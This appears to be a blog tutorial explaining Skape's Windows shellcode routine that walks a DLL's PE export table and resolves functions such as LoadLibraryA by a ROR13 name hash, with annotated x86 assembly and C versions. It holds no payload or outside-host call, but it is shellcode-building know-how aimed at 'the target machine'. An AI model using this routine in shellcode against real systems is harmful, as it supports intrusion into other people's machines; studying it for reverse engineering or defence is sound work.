Having read and understood Skape’s paper on Windows shellcode, I thought I’d provide yet another explanation of how it works. Yesterday I explained finding kernel32.dll, so today I will explain Skape’s method of resolving symbols inside a DLL.

Over at OpenRCE you can find a very useful PDF describing the structure of a PE file but I have drawn a diagram showing only the necessary elements:

[Diagram: finding exported functions]

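All addresses inside the PE file that we use here are relative to the base address at which the DLL is loaded (they are relative virtual addresses, or RVAs). They are NOT absolute, so the base must be added before they can be dereferenced.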

Skape’s 'find_function' function takes two arguments: the first is the base address of the DLL to search and the second is a hash of the name to find. On entry, the return address is at [esp], the DLL base at [esp + 4] and the hash at [esp + 8], so the stack looks like this:

[Diagram: find function initial stack]

The first instruction (pushad) saves all eight general-purpose registers (EAX, ECX, EDX, EBX, the original ESP, EBP, ESI and EDI, pushed in that order). That moves ESP down by 0x20 bytes, after which the stack looks like this:

[Diagram: stack in find function]

Stack layout after having executed the 'pushad' instruction
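As a reading aid for the offsets used in the assembly, the stack after 'pushad' can be pictured as a C struct. This is only a sketch: the struct, field and function names are made up for illustration, and it assumes 32-bit x86 where every stack slot is four bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical names. Layout of the memory ESP points at right after
   pushad, lowest address first. */
struct find_function_frame {
    uint32_t saved_edi;      /* [esp + 0x00] pushed last              */
    uint32_t saved_esi;      /* [esp + 0x04]                          */
    uint32_t saved_ebp;      /* [esp + 0x08]                          */
    uint32_t saved_esp;      /* [esp + 0x0c] ESP value before pushad  */
    uint32_t saved_ebx;      /* [esp + 0x10]                          */
    uint32_t saved_edx;      /* [esp + 0x14]                          */
    uint32_t saved_ecx;      /* [esp + 0x18]                          */
    uint32_t saved_eax;      /* [esp + 0x1c] pushed first             */
    uint32_t return_address; /* [esp + 0x20]                          */
    uint32_t dll_base;       /* [esp + 0x24] first argument           */
    uint32_t name_hash;      /* [esp + 0x28] second argument          */
};

/* Checks the three offsets that the routine actually touches. */
static void check_frame_layout(void) {
    assert(offsetof(struct find_function_frame, saved_eax) == 0x1c);
    assert(offsetof(struct find_function_frame, dll_base)  == 0x24);
    assert(offsetof(struct find_function_frame, name_hash) == 0x28);
}
```

Seen this way, writing to [esp + 0x1c] replaces the saved EAX, which is how the result survives the final 'popad'.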

The code begins by saving the registers and finding the export table (IMAGE_EXPORT_DIRECTORY). This is accomplished by the following instructions:

pushad                       ;Save registers
mov  ebp, [esp + 0x24]       ;Put first argument (dll base) into ebp
mov  eax, [ebp + 0x3c]       ;Put offset of PE header into eax
mov  edx, [ebp + eax + 0x78] ;Put offset of export directory into edx
add  edx, ebp                ;Offset + base = absolute address

Now EDX contains the absolute address in memory of the IMAGE_EXPORT_DIRECTORY structure. Next, the number of names is put into ECX and the address of the name address table into EBX:

mov   ecx, [edx + 0x18]  ;Number of names
mov   ebx, [edx + 0x20]  ;Offset of names table
add   ebx, ebp           ;Adding EBP makes address absolute

Now ECX contains the number of exported names and EBX contains the address of the array of name offsets. Next we enter a loop which iterates backward through all exported names, hashing each name and comparing it to the requested value.
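The header walk up to this point can be mirrored in C, which may make the offsets easier to follow. This is a minimal sketch, not Skape's code: 'read_u32', 'export_view' and 'locate_exports' are hypothetical names, the image is assumed to be a 32-bit (PE32) module already mapped in memory, and no bounds checking is done. In a 64-bit (PE32+) image the export entry sits at 0x88 instead of 0x78.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Read a little-endian 32-bit value from a possibly unaligned pointer. */
static uint32_t read_u32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical container for what the assembly keeps in registers. */
struct export_view {
    const uint8_t *export_dir;  /* EDX: IMAGE_EXPORT_DIRECTORY, absolute */
    uint32_t number_of_names;   /* ECX: number of exported names         */
    const uint8_t *names;       /* EBX: array of name offsets, absolute  */
};

/* base points at the start of a mapped PE32 image (assumption). */
static struct export_view locate_exports(const uint8_t *base) {
    struct export_view v;
    assert(base != NULL);
    uint32_t pe_offset  = read_u32(base + 0x3c);             /* offset of PE header */
    uint32_t export_rva = read_u32(base + pe_offset + 0x78); /* export directory    */
    v.export_dir      = base + export_rva;                   /* offset + base       */
    v.number_of_names = read_u32(v.export_dir + 0x18);
    v.names           = base + read_u32(v.export_dir + 0x20);
    return v;
}
```

Every value read from the headers is an offset, so each one gets the base added before it is used as a pointer, exactly like the 'add reg, ebp' instructions.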

A C version of the hashing algorithm would look like this:

#define ROR(v,n) (((v)>>((n)%32))|((v)<<(32-((n)%32))))
const char * name = "LoadLibraryA";
unsigned int hash = 0;
while (*name) {
    hash = ROR(hash, 13) + (unsigned char)*name; /* rotate, then add char */
    name++;                                      /* next character */
}
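For experimenting with other names, the same hash can be wrapped in a function. This is a sketch under a few assumptions: 'ror32' and 'ror13_hash' are names chosen here for illustration, and characters are treated as unsigned bytes to match what 'lodsb' does with a zeroed EAX.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Rotate a 32-bit value right by count bits. */
static uint32_t ror32(uint32_t value, unsigned count) {
    count &= 31;
    if (count == 0)
        return value;          /* avoid an undefined shift by 32 */
    return (value >> count) | (value << (32 - count));
}

/* Hash a NUL-terminated name: rotate right by 13, then add the character. */
static uint32_t ror13_hash(const char *name) {
    uint32_t hash = 0;
    assert(name != NULL);
    while (*name) {
        hash = ror32(hash, 13) + (unsigned char)*name;
        name++;
    }
    return hash;
}
```

With this function, ror13_hash("LoadLibraryA") evaluates to 0xec0e4e8e, which is the value you would push as the second argument to find that export.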

The code goes like this:

find_function_loop:
jecxz find_function_finished ;No more names, go to end
dec   ecx                    ;Decrement ECX
mov   esi, [ebx + ecx * 4]   ;Offset of next exported name
add   esi, ebp               ;Make it absolute

xor   edi, edi               ;EDI will contain calculated hash
xor   eax, eax               ;AL will contain character...zero top bits
cld                          ;Make lodsb increment esi

compute_hash_again:
lodsb                        ;Put char at ESI into AL and increment ESI
test  al, al                 ;Reached end of string ?
jz    compute_hash_finished  ;Yes we did
                             ;End hashing and start comparing
ror   edi, 0xd               ;Rotate right 13 bits
add   edi, eax               ;Add character
jmp   compute_hash_again     ;Again with next character

compute_hash_finished:
cmp   edi, [esp + 0x28]      ;Compare computed hash with second arg
jnz   find_function_loop     ;Not equal...try next name

mov   ebx, [edx + 0x24]      ;Found! Put offset of ordinals into EBX
add   ebx, ebp               ;Make it absolute
mov   cx, [ebx + 2 * ecx]    ;Put ordinal in CX
                             ;ECX contains index of name which
                             ;corresponds to the index into the ordinal
                             ;table. Each ordinal is two bytes long

mov   ebx, [edx + 0x1c]      ;Put offset of function table into EBX
add   ebx, ebp               ;Make it absolute
mov   eax, [ebx + 4 * ecx]   ;Use ordinal as index into function table
                             ;and put offset of function into EAX
add   eax, ebp               ;Make it absolute

mov   [esp + 0x1c], eax      ;Overwrite the saved EAX register
                             ;with the found address

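find_function_finished:
popad                        ;Restore registers
ret                          ;Return with EAX=absolute address of function
                             ;(if no name matched, the saved EAX was not
                             ;overwritten and EAX comes back unchanged)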
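To see the three export tables working together, here is a rough C model of the whole lookup. It is a sketch rather than a translation of Skape's code: all function names are hypothetical, the image is assumed to be a mapped 32-bit (PE32) module, there is no bounds checking, and a failed lookup returns NULL, whereas the assembly simply leaves EAX untouched.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

static uint16_t rd16(const uint8_t *p) {
    return (uint16_t)(p[0] | (p[1] << 8));
}

static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Rotate right by 13, then add each character (same hash as the assembly). */
static uint32_t hash_name(const char *s) {
    uint32_t h = 0;
    for (; *s; s++)
        h = ((h >> 13) | (h << 19)) + (unsigned char)*s;
    return h;
}

/* Returns the absolute address of the export whose name hashes to
   wanted, or NULL if no exported name matches. */
static const uint8_t *find_function(const uint8_t *base, uint32_t wanted) {
    assert(base != NULL);
    const uint8_t *dir       = base + rd32(base + rd32(base + 0x3c) + 0x78);
    uint32_t       count     = rd32(dir + 0x18);        /* number of names */
    const uint8_t *functions = base + rd32(dir + 0x1c); /* function table  */
    const uint8_t *names     = base + rd32(dir + 0x20); /* names table     */
    const uint8_t *ordinals  = base + rd32(dir + 0x24); /* ordinals table  */

    while (count-- > 0) {                       /* walk the names backward */
        const char *name = (const char *)(base + rd32(names + 4 * count));
        if (hash_name(name) == wanted) {
            uint16_t ordinal = rd16(ordinals + 2 * count); /* name index -> ordinal */
            return base + rd32(functions + 4 * ordinal);   /* ordinal -> function   */
        }
    }
    return NULL;
}
```

The point to notice is the double indirection: the index of the matching name selects a 16-bit entry in the ordinals table, and that entry, not the name index itself, selects the slot in the function table.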

The code is pretty clear once you can visualize the structures. With these two pieces of shellcode you can build more or less anything, since you can resolve a function such as LoadLibraryA in kernel32.dll, load any library on the target machine and use its functionality.